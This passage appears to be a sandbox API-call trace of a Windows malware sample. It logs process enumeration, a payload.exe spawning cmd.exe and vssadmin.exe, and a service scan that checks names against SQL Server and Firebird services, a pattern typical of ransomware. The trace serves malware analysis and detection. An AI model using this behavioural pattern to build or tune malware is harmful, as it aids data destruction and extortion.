th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0038.369] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0038.369] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0038.370] lstrlenW (lpString="fraud stuck.exe") returned 15 [0038.370] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0038.370] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0038.370] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0038.371] lstrlenW (lpString="attended.exe") returned 12 [0038.371] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0038.372] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0038.372] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0038.372] lstrlenW (lpString="pan physician.exe") returned 17 [0038.372] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0038.373] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0038.373] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0038.374] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0038.374] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0038.374] lstrlenW (lpString="over-celebrity.exe") returned 18 [0038.374] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0038.375] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0039.018] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0039.019] lstrlenW (lpString="dllhost.exe") returned 11 [0039.019] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0039.019] lstrlenW (lpString="dllhost.exe") returned 11 [0039.019] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0039.020] lstrlenW (lpString="payload.exe") returned 11 [0039.020] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0039.021] lstrlenW (lpString="cmd.exe") returned 7 [0039.021] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0039.021] lstrlenW (lpString="conhost.exe") returned 11 [0039.021] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0039.022] lstrlenW (lpString="vssadmin.exe") returned 12 [0039.022] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0039.023] lstrlenW (lpString="VSSVC.exe") returned 9 [0039.023] Process32NextW (in: hSnapshot=0x1c8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0039.023] CloseHandle (hObject=0x1c8) returned 1 [0039.024] Sleep (dwMilliseconds=0x1f4) [0039.717] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626cf8 [0039.718] EnumServicesStatusExW (in: hSCManager=0x626cf8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0039.718] GetLastError () returned 0xea [0039.718] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x6c08c8 [0039.718] EnumServicesStatusExW (in: hSCManager=0x626cf8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c08c8, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c08c8, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0039.719] CloseServiceHandle (hSCObject=0x626cf8) returned 1 [0039.719] lstrlenW (lpString="Appinfo") returned 7 [0039.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0039.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0039.719] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0039.719] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0039.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0039.719] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0039.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0039.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0039.719] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0039.719] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0039.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0039.719] lstrlenW (lpString="AudioSrv") returned 8 [0039.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0039.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0039.719] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0039.719] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0039.719] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0039.719] lstrlenW (lpString="BFE") returned 3 [0039.719] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0039.719] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0039.720] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0039.720] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0039.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0039.720] lstrlenW (lpString="CryptSvc") returned 8 [0039.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0039.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0039.720] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0039.720] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0039.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0039.720] lstrlenW (lpString="CscService") returned 10 [0039.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0039.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0039.720] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0039.720] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0039.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0039.720] lstrlenW (lpString="DcomLaunch") returned 10 [0039.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0039.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0039.720] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0039.720] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0039.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0039.720] lstrlenW (lpString="Dhcp") returned 4 [0039.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0039.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0039.720] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0039.720] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0039.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0039.720] lstrlenW (lpString="Dnscache") returned 8 [0039.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0039.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0039.720] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0039.720] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0039.720] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0039.720] lstrlenW (lpString="DPS") returned 3 [0039.720] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0039.720] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0039.720] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0039.721] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0039.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0039.721] lstrlenW (lpString="eventlog") returned 8 [0039.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0039.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0039.721] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0039.721] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0039.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0039.721] lstrlenW (lpString="EventSystem") returned 11 [0039.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0039.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0039.721] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0039.721] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0039.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0039.721] lstrlenW (lpString="gpsvc") returned 5 [0039.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0039.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0039.721] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0039.721] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0039.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0039.721] lstrlenW (lpString="iphlpsvc") returned 8 [0039.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0039.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0039.721] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0039.721] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0039.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0039.721] lstrlenW (lpString="LanmanServer") returned 12 [0039.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0039.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0039.721] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0039.721] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0039.721] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0039.721] lstrlenW (lpString="LanmanWorkstation") returned 17 [0039.721] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0039.721] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0039.722] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0039.722] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0039.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0039.722] lstrlenW (lpString="lmhosts") returned 7 [0039.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0039.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0039.722] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0039.722] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0039.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0039.722] lstrlenW (lpString="MMCSS") returned 5 [0039.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0039.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0039.722] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0039.722] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0039.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0039.722] lstrlenW (lpString="MpsSvc") returned 6 [0039.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0039.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0039.722] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0039.722] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0039.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0039.722] lstrlenW (lpString="Netman") returned 6 [0039.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0039.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0039.722] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0039.722] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0039.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0039.722] lstrlenW (lpString="netprofm") returned 8 [0039.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0039.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0039.722] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0039.722] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0039.722] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0039.722] lstrlenW (lpString="NlaSvc") returned 6 [0039.722] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0039.722] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0039.723] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0039.723] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0039.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0039.723] lstrlenW (lpString="nsi") returned 3 [0039.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0039.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0039.723] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0039.723] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0039.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0039.723] lstrlenW (lpString="PcaSvc") returned 6 [0039.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0039.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0039.723] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0039.723] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0039.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0039.723] lstrlenW (lpString="PlugPlay") returned 8 [0039.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0039.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0039.723] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0039.723] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0039.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0039.723] lstrlenW (lpString="Power") returned 5 [0039.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0039.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0039.723] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0039.723] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0039.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0039.723] lstrlenW (lpString="ProfSvc") returned 7 [0039.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0039.723] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0039.723] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0039.723] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0039.723] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0039.723] lstrlenW (lpString="RpcEptMapper") returned 12 [0039.723] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0039.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0039.724] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0039.724] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0039.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0039.724] lstrlenW (lpString="RpcSs") returned 5 [0039.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0039.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0039.724] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0039.724] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0039.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0039.724] lstrlenW (lpString="SamSs") returned 5 [0039.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0039.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0039.724] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0039.724] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0039.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0039.724] lstrlenW (lpString="Schedule") returned 8 [0039.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0039.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0039.724] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0039.724] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0039.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0039.724] lstrlenW (lpString="SENS") returned 4 [0039.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0039.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0039.724] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0039.724] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0039.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0039.724] lstrlenW (lpString="ShellHWDetection") returned 16 [0039.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0039.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0039.724] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0039.724] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0039.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0039.724] lstrlenW (lpString="Spooler") returned 7 [0039.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0039.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0039.725] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0039.725] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0039.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0039.725] lstrlenW (lpString="swprv") returned 5 [0039.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0039.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0039.725] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0039.725] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0039.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0039.725] lstrlenW (lpString="SysMain") returned 7 [0039.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0039.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0039.725] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0039.725] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0039.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0039.725] lstrlenW (lpString="Themes") returned 6 [0039.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0039.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0039.725] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0039.725] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0039.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0039.725] lstrlenW (lpString="TrkWks") returned 6 [0039.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0039.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0039.725] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0039.725] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0039.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0039.725] lstrlenW (lpString="UxSms") returned 5 [0039.725] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0039.725] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0039.725] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0039.725] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0039.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0039.725] lstrlenW (lpString="VSS") returned 3 [0039.726] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0039.726] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0039.726] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0039.726] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0039.726] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0039.726] lstrlenW (lpString="WdiServiceHost") returned 14 [0039.726] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0039.726] 